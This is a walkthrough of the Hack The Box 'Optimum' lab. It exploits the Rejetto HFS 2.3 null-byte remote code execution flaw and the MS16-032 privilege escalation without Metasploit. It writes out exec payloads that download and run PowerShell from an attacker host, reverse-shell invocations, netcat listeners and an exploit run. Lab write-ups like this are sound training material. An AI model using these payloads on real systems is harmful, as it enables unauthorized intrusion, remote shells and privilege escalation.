This hack the box Optimum walkthrough covers rooting the Optimum box offered by Hack the Box. I won’t be using Metasploit! I recently rooted Jerry another box as well.
Table of Contents
Initial Enumeration
Running nmap and AutoRecon discover a single open port a web service running on HTTP TCP 80. What is more interesting is that the service is HttpFileServer or HFS Rejetto server version 2.3.
HFS 2.3 Vulnerability
The HFS application does not handle the null byte %00 properly and this allows remote code execution. Attackers can pass in commands after a null byte sequence to execute on the server remotely. The null byte sequence terminates the regex parsing by the application’s written language but not the whole string.
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
From the CVE we have an example abuse of this vulnerability.
http://localhost:80/?search=%00{.exec|cmd.}So the question is then what to send the HFS server in order to get a reverse shell connection?
How to Exploit HFS Server 2.3
Using Burp Suite
You will need to download Empire and Nishang locally and then modify nishang’s Invoke-PowerShellTcp.ps1 to add a command in the end of the file.
Invoke-PowerShellTcp -Reverse -IPAddress {kali ip addr} Port 4444Now it is ready to be called into memory on the target.
{.exec|c:\Windows\SysNative\PowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:80/Invoke-PowerShellTcp.ps1')}Don’t forget to URL encode the request with cntrl + u and then send it on so we can get a shell back.
Send it from the Intercept tab to the Repeater tab using cntrl + r and let’s put in a new set of commands in brackets.
We need to start a netcat listener to receive a shell connection back to the port given in the Invoke-PowerShellTcp.ps1 script.
nc -nlvp 4444Start a Python webserver to host the PowerShell file and send the request in Burp.
python -m SimpleHTTPServer 8000Exploit without Metasploit
Start by getting the exploit from ExploitDB. The first step to using this exploit is to copy the netcat binary from the /usr/share/windows-binaries directory into the folder where we will be hosting the exploit script. The script will grab the netcat file from the SimpleHTTPServer server and send a shell back to Kali.
nc -nvlp 1234
python -m SimpleHTTPServer 80
python 39161.py 10.10.10.8 80
There is the first shell and it looks like it came back with a normal user account. So that means it is necessary to escalate privileges by following the routine of more enumeration and more exploitation.
Privilege Escalation
Try using Windows exploit suggester or Sherlock
Windows Exploit Suggester
To use Windows Exploit Suggester first run a command on the Windows shell to get the sysinfo command output.
Copy the output of this command into a text file name it sysinfo.txt and proceed.
# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
# update the local db
python windows-exploit-suggester.py --updateNow to use it to identify vulnerabilities. The –update command downloads the Microsoft security bulletin database locally.
C:\lowuser> python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls
Exploit MS16-032
This second exploit is two parts. First add this to the end of the Invoke-MS16032.ps1 file found in the Empire mod source directory. If you don’t have Empire installed go ahead and do so.
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.17:8000/newshell.ps1')"Next add this to Invoke-PowerShellTcp.ps1 from nishang shells and rename it newshell.ps1 so there won’t be any parsing errors from PowerShell when we call it.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 4444Now from the open shell where I am the optimum user I run the following command to attempt privilege escalation.
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:8000/ms16032.ps1')Running the command above will unfortunately return an error about not being able to grab a handle.
Here is how you fix it to continue by calling the 64 bit version of the PowerShell binary.
C:\windows\sysnative\windowspowershell\v1.0\powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.17:8000/ms16032.ps1')
Checking the SimpleHTTPServer server you can see where the exploit script retrieved the Invoke-MS16032.ps1 file which then chained a new request to the remote file Invoke-PowerShellTcp.ps1, the file that sent the actual connection back to Kali.
root@kali:~/Empire/data/module_source/privesc# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.8 - - [23/Nov/2019 14:59:47] "GET /ms16032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [23/Nov/2019 15:10:09] "GET /ms16032.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [23/Nov/2019 15:10:24] "GET /newshell.ps1 HTTP/1.1" 200 -
That’s it for the hack the box: Optimum walkthrough!